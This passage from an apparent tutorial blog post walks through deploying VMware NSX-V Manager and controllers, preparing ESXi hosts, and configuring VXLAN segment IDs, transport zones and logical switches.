Next, select the datastore in which you want to deploy the VMware NSX-V Manager. You can also select the disk format during the deployment.
Choose the storage and disk policy
Select the virtual network to attach the VMware NSX-V manager appliance. This network connection is for connecting to the management interface that you will configure during the template customization process.
Choose the port group for the management network for the VMware NSX-V Manager
There are many important details to give attention to in the template customization step. Here you will configure the passwords for accessing the manager appliance as well as the pertinent network configuration information.
Customize the NSX-V Manager template
Finally, we arrive at the summary screen that displays the configuration before finalizing the deployment. Make sure all the information shown is correct before clicking Finish.
Ready to complete and finalize the VMware NSX-V Manager appliance deployment
Integrate VMware NSX-V Manager with vCenter Server
To enable VMware NSX-V’s functionality and configure VMware VXLAN in your environment, you integrate the newly deployed VMware NSX-V Manager with VMware vCenter Server. To do this involves registering the vCenter Server Lookup Service URL and the vCenter Server hostname. It will be the same address for most now who run the integrated Platform Services Controller configuration (recommended) with vCenter Server.
Registering the Lookup Service URL and vCenter Server address
Deploy NSX Controller Cluster
After deploying the NSX Manager and integrating it with vCenter Server, you will want to deploy the NSX Controller Cluster in your environment. The NSX Controller provides essential functionality in VMware NSX-V virtualized networking. The NSX Controller provides the control plane functions for NSX logical switching and Distributed Logical Router (DLR) functionality.
The NSX Controller maintains information about all hosts and logical switches and distributed logical routers in the environment. The Logical Switches are the VXLANs in the vSphere environment. The NSX Controller is a required component if you want to deploy DLRs and VXLAN in unicast or hybrid operation mode.
To deploy the NSX Controller, navigate to Networking and Security > Installation and Management > NSX Controller Nodes and choose to Add a new Controller Node.
Adding a new NSX Controller Node
Choosing the Add function launches the Add Controller wizard. First, choose a password for the controller.
Configuring a password for the NSX Controller Node
Next, on the Deployment & Connectivity screen, choose a name for the controller, datacenter, cluster/resource, datastore, host, folder, IP Pool, and select which vSphere Distributed Switch it will connect.
Configuring deployment and connectivity options for the VMware NSX Controller Node
After completing the wizard, the NSX Controller Node will begin deploying. The deployment will generally take a few minutes. As a note, you will want to deploy three controller nodes for high-availability for a production environment.
New NSX Controller Node is deployed successfully
Now, let’s prepare the ESXi hosts in the vSphere cluster for VMware VXLAN configuration.
Preparing ESXi Hosts for VMware VXLAN
One of the first steps you will go through to prepare the ESXi hosts for VMware VXLAN is installing NSX. This process installs the special VMware NSX-V ESXi VIBs needed for interacting with VMware NSX-V. Under the Networking and Security > Host Preparation screen, you will see your vSphere cluster(s) displayed with the option to Install NSX. Click the Install NSX button.
Before proceeding, you need to have a valid VMware NSX Data Center license installed before installing the NSX VIBs on your vSphere cluster ESXi hosts.
Choosing to Install NSX
Verify the installation of the VMware NSX-V VIBs
Configure VMware VXLAN
After installing the special VMware NSX-V VIBs on your vSphere cluster ESXi hosts, the next step is configuring VXLAN. Configuring VMware VXLAN on your vSphere cluster ESXi hosts is the process that creates the VXLAN VTEPs on your ESXi hosts used for encapsulating and decapsulating the Layer 2 frames sent via network virtualization.
On the Networking and Security > Installation and Upgrade > Host Preparation screen, after installing the NSX VIBs, choose to Configure the VXLAN.
Configuring VXLAN as part of the VMware NSX-V configuration
The Configure VXLAN Networking dialog box appears. Here you choose the vSphere Distributed Switch you want to use for VXLAN traffic and how you want to perform IP Addressing on your vmkNICs created for VTEP endpoints. You can also configure the specific vmkNIC Teaming Policy for the vmkNIC configuration.
Configuring VMware VXLAN networking
Once you click Save, you will see the VXLAN configuration turn to a green checkmark showing it is configured. When you click the View configuration link, you can view the configured settings.
VXLAN successfully configured in VMware NSX-V
After configuring the VXLAN settings, on the Logical Network Settings tab, you will see the default VXLAN port shown – 4789. As noted, you will want to verify the VXLAN port is allowed between the various ESXi VXLAN hosts, particularly if these reside in different networks and need to form VXLAN tunnels.
On the Logical Network Settings tab, the Segment ID configuration is the configuration that
Verifying the VXLAN port and editing Segment IDs
On the Edit Segment ID Settings dialog box, you choose a Segment ID pool range. The Segment ID range will essentially be the pool of VNIs (VXLAN Network Identifiers) assigned to the logical networks. Note, this is a range and not a single value.
Assigning a Segment ID pool
Next, we need to create the Transport Zones that defines the scope of any Logical Switches or Distributed Logical Routers (DLR) created. It controls which hosts a logical switch can reach, and it can span one or more vSphere clusters. It also defines which clusters and, by extension, which virtual machines can participate in a particular logical network.
Beginning the process to create VMware NSX-V Transport Zones
When creating a new Transport Zone, you define the Transport Zone’s name, its replication mode and select which clusters participate.
Creating a new Transport Zone
At this point, we have everything configured and ready to go for starting to create the Logical Switch (VXLAN) constructs in the environment. After assigning a Segment ID pool, we will start allocating logical resources as part of the VMware VXLAN implementation. Below, as you can see, the VXLAN configuration has been completed for the ESXi hosts in the vSphere cluster and we have “green” indicators across the board which is what we want to see.
VXLAN VMware configuration completed
VXLAN VMware Logical Switch Configuration
After completing the infrastructure configuration required for VMware NSX-V, we are now ready to create Logical Switches. Each Logical Switch is essentially a VXLAN in the environment. Navigate to Networking and Security > Logical Switches. Click the Add button to create a new Logical Switch.
Creating a new VMware NSX-V Logical Switch
You will configure the Logical Switch name, description, Transport Zone, Replication mode, IP Discover, and MAC learning configuration on the New Logical Switch dialog.
Configuring a new VMware NSX-V Logical Switch (VXLAN)
The new VMware NSX-V Logical Switch is created successfully. You will note the Segment ID configured uses the first available segment ID in the segment ID range configured earlier.
A VXLAN Logical Switch created in VMware NSX-V
Once the new Logical Switch is created, it will appear in the list of available networks to which a new virtual machine can be connected.
Connecting a new virtual machine to a new Logical Switch
VXLAN is a robust encapsulation protocol used to create software-defined overlay networks that can create Layer 2 segments across routed boundaries. It offers many benefits when compared to convention VLAN segments. Using VXLAN software-defined networks decouples the overlay network configuration from the underlay physical network. It allows making configuration changes on either the overlay or underlay networks without interdependencies between them. VXLAN encapsulates a Layer 2 Ethernet frame within an IP packet. These special packets are transmitted across the IP network and encapsulated/decapsulated using the VXLAN Tunnel Endpoint (VTEP).
VMware NSX-V is VMware’s software-defined networking technology based on VXLAN encapsulation that allows easily building out VXLAN-based SDN in VMware vSphere environments. As shown, various components allow creating the VXLAN tunnel in a VMware vSphere environment. These include the NSX Manager, NSX Controller, ESXi VIBs, Segment IDs, and Transport Zones.
By configuring the required VXLAN VMware components, you can provision Logical Switches in the environment representing a VXLAN allowing Layer 2 communication transmitted over the physical IP network. Using this approach, VMs that reside across Layer 3 boundaries can be connected to the same Logical Switch and communicate as if they reside on the same physical network switch.
Not a DOJO Member yet?
Join thousands of other IT pros and receive a weekly roundup email with the latest content & updates! | <urn:uuid:13dc0783-d430-4eaf-83a4-26d70e6c9f30> | CC-MAIN-2022-40 | https://www.altaro.com/vmware/vmware-vxlan-what-is-it-and-how-to-use-it/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337446.8/warc/CC-MAIN-20221003231906-20221004021906-00403.warc.gz | en | 0.863569 | 4,387 | 2.8125 | 3 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.